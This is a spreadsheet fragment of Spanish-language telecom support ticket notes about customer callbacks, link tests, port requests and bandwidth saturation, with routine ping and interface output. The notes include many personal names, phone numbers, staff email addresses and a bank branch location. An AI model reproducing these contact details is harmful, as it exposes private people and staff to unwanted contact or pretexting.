  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 16:29
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || F4608860 || TOMZA GAS DE EL SALVADOR, S.A
BUENA TARDE
    SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	TICKET
TOMZA GAS DE EL SALVADOR, S.A
F4608860 -
SD1136712
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4608861</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SKARLET MANZANEROS AL NUMERO 41753805 INDICA QUE AUN PERSISTE EL INCOVENIENTE QUE ENLACE SI TIENE PERO NO PASA A LAS PC INDICA QUE ESO LE PASO EL OTRO DIA Y ERA PORQUE UN PUERTO ESTABA BLOQUEADO SOLICITA SE REVISE || SE NOTIFICA A GESTOR **
-ID 1001231113
**</t>
  </si>
  <si>
    <t>F4608869</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MYNOR GARCIA  AL 31068959 SOLICITA REALIZAR PRUEBAS || SE LE SOLICITA UN MOMENTO PERO SE CORTA LLAMADA || SE NOTIFICA A GESTOR **
-ID 1001234802
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MYNOR GARCIA QUIEN INDICA QUE TODOS LOS DIDS LOS DESVIA HACIA OTRAS DIRECCIONES FISICAS POR MEDIO DE INTERNET DE CLARO.
POR EJEMPLO EL DID 77957002 LO DESVIAN HACIA TOTONICAPAN. INDICA QUE LAS AGENCIAS SI TIENEN INTERNET PERO NO TIENEN LLAMADAS.
HAY  DIDS A LOS CUALES SI COMPLETAN LAS LLAMADAS QUE SON EL 77957001 Y  77957010,77957011.
SE LE SOLICITO AL CLIENTE REINICAR LOS EQUIPOS DE LAS AGENCIAS A DONDE NO COMPLETAN LAS LLAMADAS CLIENTE SOLICITA LLAMADA EN 45MIN.
1001247643
COLA:
NOMBRE: A: 31068959
NÚMERO: 31068959
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 31068959
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 14:51:06</t>
  </si>
  <si>
    <t>F4608874</t>
  </si>
  <si>
    <t>ELIZABETH POR PARTE DEL CLIENTE VALIDA</t>
  </si>
  <si>
    <t>F4608891</t>
  </si>
  <si>
    <t>##SE VALIDA EN LLAMADA CON TECNICO Y CONJUNTO CON CLIENTE EDNA QUE SE PUEDE PROCEDER AL CIERRE DE TICKET ###
1001258043
COLA:
NOMBRE: A: 50583687000
NÚMERO: 50583687000
DURACIÓN: 0:05:12
ESTADO: CONECTADA
DETALLES: 50583687000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 20/06/2022 15:27:10</t>
  </si>
  <si>
    <t>F4608900</t>
  </si>
  <si>
    <t>SE LLAMA A FREEDY VASQUEZ, QUIEN PROPORCIONA 46123417 JOSE LUIZ OSUNA, MENCIONAR QUE FREEDY LO REFIRIO PARA VALIDAR EL SERVICIO
1001226577
COLA:
NOMBRE: A: 53186210
NÚMERO: 53186210
DURACIÓN: 0:02:36
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 53186210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 20/06/2022 13:42:53</t>
  </si>
  <si>
    <t>SE HABLA CON JOSE LUIS OZUNA 46123417 , SE INFORMA QUE ENLACE ESTA OPERATIVO PERO SE SOLICITA VALIDAR SI CUENTAN CON UPS EN LA CAPILLA Y SI ESTE ESTA EN BUEN ESTADO, INDICA QUE EN EL LUGAR NO SE MANTIENE PERSONAL Y NECESITA CONSULTAR CON SU JEFE SI LE AUTIRZA IR A VALIDAR, POR LO QUE SOLICITA QUE SE LLAME EL DIA DE MALANA EN EL TRANSCURSO DE LA MAÑANA.
ID
1001510062
COLA:
NOMBRE: A: 46123417
NÚMERO: 46123417
DURACIÓN: 0:01:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 46123417
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 21/06/2022 17:00:44</t>
  </si>
  <si>
    <t>SE LLAMO A JOSE LUIS QUIEN INDICA QUE NO SE ENCUENTRA CERCA DEL SECTOR, PERO INDICA QUE ES POSIBLE FALLA DE ENERGIA SI INCONVENIENTE PERSISTE SOLICITA QUE SE LE LLAME MAÑANA PARA ATENDER EL INCIDENTE
1001229339
COLA:
NOMBRE: A: 46123417
NÚMERO: 011 50246123417
DURACIÓN: 0:02:56
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50246123417
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 20/06/2022 13:53:36</t>
  </si>
  <si>
    <t>F4608909</t>
  </si>
  <si>
    <t xml:space="preserve">
SE INTENTA LLAMAR A WALTER VELAZQUES AL NUMERO: 59908613 PERO NO SE TIENE RESPUESTA SE LLAMARA EN OTRO MOMENTO.
1001219116
COLA:
NOMBRE: A: 59908613
NÚMERO: 55280199
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 20/06/2022 13:15:56
1001218963
COLA:
NOMBRE: A: 59908613
NÚMERO: 55280199
DURACIÓN: 0:00:13
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 20/06/2022 13:15:28</t>
  </si>
  <si>
    <t>CLIENTE SE COMUNICA CON EL COMPAÑERO WILLIAMS SANAVRIA CON QUIEN REALIZAN PRUEBAS A LOS EQUIPOS, SE REINCIA EL IMC, EL ENLACE LEVANTA. SE DETECTA QUE EL EQUIPO TIENE UN UPTIME HACE  MINUTOS.
SE LLAMA NUEVAMNETE AL CLIETNE QUIEN CONFIRMA QUE YA TIENE SISTEMA, POR LO QUE AUTORIZA EL CIERRE DEL TT.
1001223626
COLA:
NOMBRE: A: 59908613
NÚMERO: 59908613
DURACIÓN: 0:01:49
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 59908613
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 20/06/2022 13:32:25</t>
  </si>
  <si>
    <t>F4608914</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MIGUEL GUARDADO 23250415  NO CONTESTO IVR ENVIA A BUZON, 1001980613.</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE MIGUEL GUARDADO NO CONTESTO, INFORMAN QUE ESTA EN REUNION, SOLICITA LLAMAR A LAS 4PM. ID: 1001812661.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL GUARDADO 23250415 SOLICITA QUE SE LE LLAME MAÑANA A MEDIO DIA PARA DARLE SEGUIMIENTO **
-ID 1001277933
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL GUARDADO 23250415 PERO NO RESPONDEN
-ID 1001255900</t>
  </si>
  <si>
    <t>ESTIMADOS VALIDAR MEDIANTE SD, SE CONFIRMA CONEXION DE CETRAL A PUNTO REMOTO SIN PROBLEMAS, GRACIAS</t>
  </si>
  <si>
    <t>F4608915</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS CON CLIENTE SR. RONALD SABALA SE DETERMINA QUE EL PROBLEMA ES EN SU RED INTERNA YA QUE LA CONEXION DE SU SW HACIA SU FORTINET SE CAE LA CONEXION CONSTANTEMENTE.</t>
  </si>
  <si>
    <t>**SE LLAMA A ANA QUIROZ AL NUMERO 77935300 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001331982
**</t>
  </si>
  <si>
    <t>F4608919</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MIGUEL GUARDADO AL 23250415 - 23250461 NO RESPONDE OPERADORA INDICA QUE EN ESTE MOMENTO NO HAY NADIE QUE PUEDA ATENDER LA LLAMADA || SE INTENTARA LUEGO **
-ID 1001208288 - 1001208687
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL GUARDADO 23250415 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001426771</t>
  </si>
  <si>
    <t>F4608930</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: COMUNICACION CELULAR TGU SD1136454</t>
  </si>
  <si>
    <t>SE VALIDA COLA DE CORREOS Y NO SE OBTIENE RESPUESTA POR PARTE DE CLIENTE--</t>
  </si>
  <si>
    <t>SE REENVIA CORREO SIN RESPUESTA DE CL...
COMUNICACION CELULAR TGU SD1136454</t>
  </si>
  <si>
    <t>F4608949</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON VIVIAN ROSALES/CLIENTE 36259975 Y SE LE BRINDAN AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4608961</t>
  </si>
  <si>
    <t>SE COTNACTA CON CLIENTE GILMER MACARIO 47697694 PARA REALIZAR PRUEBAS  PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GILMER MACARIO AL 47697694 INDICA QUE NO ESTA EN OFICINA QUE SE LE REEENVIE EL CORREO A TELEFONIACORPT@BI.COM.GT  PARA QUE NOS PUEDAN AUTORISAR LOS PERMISOS PARA LA VISITA**
-ID 1001634043
**</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TEC CARLOS ALBILLO QUIEN INDICA QUE NO HLE HAN DADO ACCESO A LAS ISNTALACIONES, SIN EMBARGO SE OBSERVA QUE SI SE SOLICITARON PERMISOS PARA INGRESAR A LA AGENCIA.
SE LLAMA A GILMER MACARIO 47697694 PARA VALIDAR LOS PERMISOS PERO NO SE TIENE RESPUESTA
SE ENVIA CORREO NUEVAMENTE SOLICITANDO PERMISOS
RE: GDN 77937100|| BANCO INDUSTRIAL.- KM.166.9 ALDEA EL CARMEN CHUTATUL STA CRUZ DEL QUICHE
MONICA YIREH CASTILLO POON
ENVIANDO...
BUENOS DÍAS ESTIMADOS SEÑORES BI,
POR ESTE MEDIO, SOLICITAMOS DE SU APOYO PARA COORDINAR LOS ACCESOS NECESARIOS PARA LA AGENCIA PARA EL PERSONAL TÉCNICO QUE ESTARÁ ATENDIENDO LA FALLA REPORTADA EN BANCO INDUSTRIAL. - KM.166.9 ALDEA EL CARMEN CHUTATUL STA CRUZ DEL QUICHE (INT. URL) 15.032884 -91.13 PARA LA REVISIÓN DEL SERVICIO DE E1 77937100. ADJUNTO ENCONTRARÁ LOS DATOS DEL PERSONAL TÉCNICO.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS YA QUE PERSONAL TÉCNICO SE ENCUENTRA EN LA AGENCIA.
SALUDOS,</t>
  </si>
  <si>
    <t>SE CONTACTA CON EDGAR JEHOMIAS MATUL GARCIA DETALLES: 58261564 PARA DAR SEGUIMIENTO AL CASO, PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO AL BI.. QUEDAMOS A LA ESPERA DE RESPUESTA POR PARTE DE CLIENTE
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: LUNES, 20 DE JUNIO DE 2022 17:56
PARA: TELEFONIACORP@BI.COM.GT &lt;TELEFONIACORP@BI.COM.GT&gt;; MACARIO RETANA, GILBER DAVID &lt;GMACARIO@BI.COM.GT&gt;; VALLEJO GARCIA, ALEX MAURICIO &lt;AVALLEJO@BI.COM.GT&gt;; VALLEJO CORDON, SERGIO EDUARDO &lt;SVALLEJO@BI.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 77937100|| BANCO INDUSTRIAL.- KM.166.9 ALDEA EL CARMEN CHUTATUL STA CRUZ DEL QUICHE
BUENA TARDE ESTIMADOS, CON RESPECTO AL E1:
GDN 77937100
BANCO INDUSTRIAL.-
 KM.166.9 ALDEA EL CARMEN CHUTATUL STA CRUZ DEL QUICHE (INT. URL) 15.032884 -91.13
SOLICITO SU AMABLE APOYO PARA EL TRÁMITE DE PERMISOS HACIA NUESTROS TÉCNICOS DESCRITOS EN EL ARCHIVO .EXCEL
QUEDAMOS PENDIENTES A LOS PERMISOS DE INGRESO,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4608966</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 52 5551745299 PARA BRINDARLE AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, NO CONTESTA; SE LE ENVÍA EL FEEDBACK POR CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1525985OH ::: TICKET CNOC IMGMD005380 ::: ENLACE CAIDO</t>
  </si>
  <si>
    <t>F4608973</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO 24903000 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001263042
**</t>
  </si>
  <si>
    <t>F4608980</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR GODOY 49392916 - 22103911 PERO NO RESPONDE
-ID 1001252547 - 1001252705</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  OSCAR GODOY AL 49392916 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001287717
**</t>
  </si>
  <si>
    <t>F4608992</t>
  </si>
  <si>
    <t>SE LLAMA A LOURDES PERO NO RESPONDE ENVIA A BUZON---
23610379</t>
  </si>
  <si>
    <t>F4609005</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO, TOMAR NOTA QUE CLIENTE ACTUALMENTE ESTA SATURANDO SU ANCHO DE BANDA.
CC_GRUPO_STI_GT_INTERNET_ZONA10#PING 8.8.8.8 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 186.151.203.5
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 24/27/28 MS
CC_GRUPO_STI_GT_INTERNET_ZONA10#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66277000      5645   3937000      4890         0
  GIGABITETHERNET0/0/1          0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0/1/0          0         0         0         0   2970000      3446  53045000      4615         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/3          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0   3834000      4871  66627000      5664         0</t>
  </si>
  <si>
    <t>CLIENTE EMANUEL HERNANDEZ AL 22012400 ACTUALMENTE EN LLAMADA SE LE DEMUESTRA QUE POR MOMENTOS SATURAN SU ENLACE, SE ENVIA CORREO CON EVIDENCIA, SE PROCEDE AL CIERRE DEL INDIDENTE, ID: 1001271779.
ASUNTO:  EVIDENCIA SATURACIÓN DE ENLACE</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE EMANUEL HERNANDEZ AL 22012400 EXT 113 INDICA QUE TIENE SOLO  40 MEGAS DE SUBIDA Y MAS LENTA LA BAJADA CLIENTE PREGUNTA CUAL IP ES LA QUE ESTA SATURANDO EL SERVICIO PARA VERIFICAR INTERNAMENTE || SE NOTIFICA A GESTOR **
-ID 1001267136
**</t>
  </si>
  <si>
    <t>F4609018</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JORGE MEJÍA/CLIENTE, SE LE INDICA ENLACE OK, CLIENTE INDICA QUE PUERTO 80 OK, PUERTO 554/443/8000 PIDE SEAN HABILITADOS; SE PIDE APOYO A GESTIÓN N1, VÍA TELEFÓNICA SE LES LLAMÓ HASTA 4 VECES, NO CONTESTAN. NO SE TUVO APOYO DE PARTE DE GESTIÓN N1; SE ESCALA CON KEVYN FONSECA/TEAM LEADER N1; ÉSTE INDICA QUE NOS APOYARÁ.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE MEJIA AL 31346006 SOLICITA QUE SE LE LLAME EN 20 MINUTOS NUEVAMENTE**
-ID 1001353883
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE MEJIA AL 31346006 INDICA QUE YA ESTA EN SITIO PARA REALIZAR
PRUEBAS SE NOTIFICA A GESTOR   **
-ID 1001366369
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE MEJIA AL 31346006 SOLICITA QUE SE LE LLAME A LAS 9:00 AM PARA REALIZAR LAS PRUEBAS**
-ID 1001332499
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MEJIA 31346006 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001497340</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MEJIA 31346006 MENCIONA QUE UNICAMENTE LLEGA POR EL PUERTO 80 PERO NECESTA QUE TRANSMITA POR EL PUERTO 8000
SE BOTIFICARA PARA EL SEGUIMIENTO
ELOPEZ@STASEGURIDAD.COM
-ID 1001294763</t>
  </si>
  <si>
    <t>F4609019</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GEOVANNI LOVO AL 22353812 - 75133236 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001271688 - 1001271963
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GEOVANNI LOVO  AL 75133236 INDICA QUE NO ESTA EN OFICINA QUE SE LE LLAME AL LIC NESTOR AL 22353812 **
-ID 1001330957
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC NESTOR AL 22353812 INDICA QUE NO TIENE ACCESO A INTERNET || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001352157
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GEOVANNI LOVO  75133236 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001330957
**</t>
  </si>
  <si>
    <t>F4609020</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NESTOR BERNAL 78402741 INDICA QUE SI SE REVISO EL CORREO QUE COMPARTIO DONDE ENVIO CUANDO VIO LAS CAIDAS QUE TUVO Y QUIERE TAMBIEN SABER SI SE DEJO CORRIENDO EL LOG QUE SOLICITO|| SE CONSULTA CUAL FUE EL ASUNTO DEL CORREO INDICA QUE ES   SOLICITUD DE HISTORIAL || SE NOTIFICA A GESTOR **
-ID 2001022643
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NESTOR BERNAL 78402741 MENCIONA QUE ESTARA COMPARTIENDO LAS PRUEBAS DE LAS CAIDAS POR CORREO
-ID 1001596113</t>
  </si>
  <si>
    <t>F4609025</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ALEX FAJARDO PERO INDICAN QUE ESTA EQUIVOCADO.
1001269868
COLA:
NOMBRE: A: 47642739
NÚMERO: 47642739
DURACIÓN: 0:00:35
ESTADO: MARCANDO
DETALLES: 47642739
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 16:00:07</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RENATO FERNANDEZ QUIEN INDICA QUE EL NUMERO DE ALEX FAJARDO ES EL 45642739
INDICA QUE A ESTA HORA YA SE RETIRARON, SOLICITA LLAMADA MAÑANA A LAS 7:15AM.
1001285784
COLA:
NOMBRE: A: 30737119
NÚMERO: 011 50230737119
DURACIÓN: 0:00:24
ESTADO: CONECTADA
DETALLES: +50230737119
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 16:53:39</t>
  </si>
  <si>
    <t>HAY TRÁFICO DE LLAMADAS, ES POR ELLO HASTA ESTA HORA EL APOYO A GESTIÓN AE; SE LLAMÓ AL GDN 23893333 DA TONO DE DESCONEXIÓN, SE BUSCA EN TICKET ANTERIORES, SE ENCUENTRA EL TEL DE RENATO FERNÁNDEZ/CLIENTE 30737119; ÉSTE INDICA QUE NO ESTÁ EN SITIO, PERO ME BRINDA TEL DE AXEL FAJARDO/CLIENTE 47642739, ÉSTE NO CONTESTA, SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4609032</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR ENLACE, A LA ESPERA DE RESPUESTA,
RE: ENLACE INESTABLE DE PALI GUACIMO ID: CONTR0001514812OC</t>
  </si>
  <si>
    <t>ENLACE CONTINUA OPERATIVO Y ESTABLE, SE SOLICITA A CLIENTE VALIDAR SU RED INTERNA YA QUE SU EQUIPO LAN NO ESTA ASOCIADO AL CPE CLARO. SE ENVIA CORREO PARA QUE CLIENTE REVISE SU RED LAN, ASUNTO: ENLACE INESTABLE DE PALI GUACIMO ID: CONTR0001514812OC
&lt;HHERCRMPN1W1N01O01EIM1&gt;PING -C 3000 -S 1500 -M 30 -B  -VPN DATOS_WALMART 10.201.12.138
  PING 10.201.12.138: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.201.12.138 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    3000 PACKET(S) RECEIVED
